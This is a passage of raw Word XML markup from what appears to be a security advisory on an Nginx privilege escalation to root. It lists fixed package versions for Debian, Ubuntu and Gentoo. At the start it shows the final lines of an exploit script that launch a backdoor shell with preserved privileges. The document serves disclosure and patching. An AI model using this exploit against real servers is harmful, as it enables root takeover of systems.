    <w:p w14:paraId="1F41DAD5"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BACKDOORPATH -p -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74E6BC" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC48D77"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 Job done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E73FFE5"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cleanexit 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732CE328" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C137630" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>---------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A9BE45" w14:textId="77777777" w:rsidR="002350DA" w:rsidRPr="002B24A4" w:rsidRDefault="002350DA" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F524B2" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728DB360" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41276D99" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A46D03" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BUSINESS IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6CB2E" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDD7B4D" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D01FC7" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker who has managed to exploit a vulnerable web application could use the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FD0DD" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability to escalate their privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DC7145" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F24CBD" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576E55A" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VII. SYSTEMS AFFECTED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D495662" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183B948" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7567C42A" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Debian:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD6443" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fixed in Nginx 1.6.2-5+deb8u3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C327C" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C099835" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17212F4E" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F207529" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fixed in the following updated Nginx package versions on Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B9E14" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492C4C97" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu 16.04 LTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43832934" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.10.0-0ubuntu0.16.04.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D07C65" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E40F39F" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu 14.04 LTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCF1F29" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.4.6-1ubuntu3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB403C" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0C1D8F" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu 16.10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6AFAC" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.10.1-0ubuntu1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E2038" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C6C9CD" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gentoo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D38A5EB" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Package www-servers/nginx on all architectures &lt; 1.10.2-r3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014230AB" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://security.gentoo.org/glsa/201701-22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6351D32E" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551F7B5B" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33CC29BA" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A698BFA" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2BD3A1" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7262B136" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3549D8" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5ECC98" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DBB6FD" w14:textId="77777777" w:rsidR="00A627C8" w:rsidRPr="002B24A4" w:rsidRDefault="00A627C8" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5507E498" w14:textId="77777777" w:rsidR="00032B69" w:rsidRPr="002B24A4" w:rsidRDefault="00032B69" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD98F82" w14:textId="77777777" w:rsidR="00032B69" w:rsidRDefault="00032B69" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77634477" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
